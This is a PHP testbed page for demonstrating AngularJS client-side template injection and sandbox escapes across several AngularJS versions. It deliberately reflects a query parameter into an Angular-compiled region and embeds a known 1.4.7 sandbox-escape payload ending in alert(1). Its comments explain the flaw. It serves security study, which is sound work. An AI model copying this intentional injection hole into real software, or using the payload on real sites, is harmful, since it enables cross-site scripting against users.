Testbed for Angular JS version 1.5.7

hidden 1.4.7

Angular JS Expression:
hello world

version: 1.0.8, 1.4.7, 1.5.7, 1.5.8, fix (1.5.9)

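<?php
// Testbed page: reflects the ?q= parameter into an AngularJS-compiled region
// so the expression handling of the bundled AngularJS build can be observed.

// Read the reflected query parameter once. A missing ?q= or an array value
// (?q[]=...) falls back to the empty string, so htmlspecialchars() below is
// always handed a string and no undefined-index notice is raised.
$q = (isset($_GET['q']) && is_string($_GET['q'])) ? $_GET['q'] : '';

// HTML-escaped form, valid in element content and in quoted attribute values.
// The encoding is given explicitly to match the page's meta charset.
$q_html = htmlspecialchars($q, ENT_QUOTES, 'UTF-8');
?>
<!doctype html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <title>1.5.9 AngularJS Sandbox Demo</title>
        <script src="angular.fix.js"></script>
        <style>
        .showme, .showhim:hover .ok{ display: none; }
        .showhim:hover .showme{ display : block; }
        </style>
    </head>
    <body>
<?php
        // NOTE(review): the heading says 1.5.7 while the title and the script
        // file name point at the 1.5.9 fix build; confirm which label is meant.
?>
        <h3>Testbed for Angular JS version 1.5.7</h3>
<?php
        // The search box sits outside the ng-app root further down, so the
        // reflected value is plain attribute text here and is not compiled by
        // AngularJS. HTML escaping is the right encoding for this position.
?>
        <form action="angular.fix.php" method="get">
            <input type="text" size="70" name="q" value="<?php echo $q_html; ?>">
            <input type="submit" value="go">
        </form>
<?php
        // Reference expression revealed on hover. It is also outside the ng-app
        // root, so it is displayed as literal text rather than evaluated. The
        // "hidden 1.4.7" label presumably names the release it was written
        // against; verify before relying on it.
?>
        <div class="showhim">
           <div class="showme"><input type="text" size="70" value="{{'a'.constructor.prototype.charAt='a'.concat; $eval('exploit=1} } };alert(1)//');}}"></div>
           <div class="ok"><i>hidden 1.4.7</i></div>
        </div>
        <hr>

            <b>Angular JS Expression:</b>
            <!-- start of AngularJS app -->
            <div ng-app>

<?php
    // Reflected GET parameter ?q=, HTML-escaped only.
    // htmlspecialchars() encodes angle brackets, ampersands and quotes but
    // leaves double curly braces untouched, so inside this ng-app root the
    // value is still compiled by AngularJS as an expression. That is the
    // purpose of this testbed. In a real application HTML escaping alone is
    // not sufficient in this position: keep untrusted text out of
    // Angular-compiled markup, or wrap it in an ng-non-bindable element.
    // The expression sandbox itself was removed in AngularJS 1.6 and was
    // never intended as a security boundary, so it must not be relied on.
    echo $q_html;
?>


            </div>
            <!-- end of AngularJS app -->
        <hr>
        <p>
            version:
            <a href="angular1.0.8.php?q=hello%20world">1.0.8</a>,
            <a href="angular1.4.7.php?q=hello%20world">1.4.7</a>,
            <a href="angular1.5.7.php?q=hello%20world">1.5.7</a>,
            <a href="angular1.5.8.php?q=hello%20world">1.5.8</a>,
            <a href="angular.fix.php?q=hello%20world">fix (1.5.9)</a>
        </p>
        <div style="margin-top: 150px">
            <code>
            <?php
                // Prints this file's own source into the page. Intentional for
                // a demo, but it discloses the whole file to every visitor, so
                // no credentials or other secrets may ever be added to it.
                show_source(__FILE__);
            ?>
            </code>
        </div>
    </body>
</html>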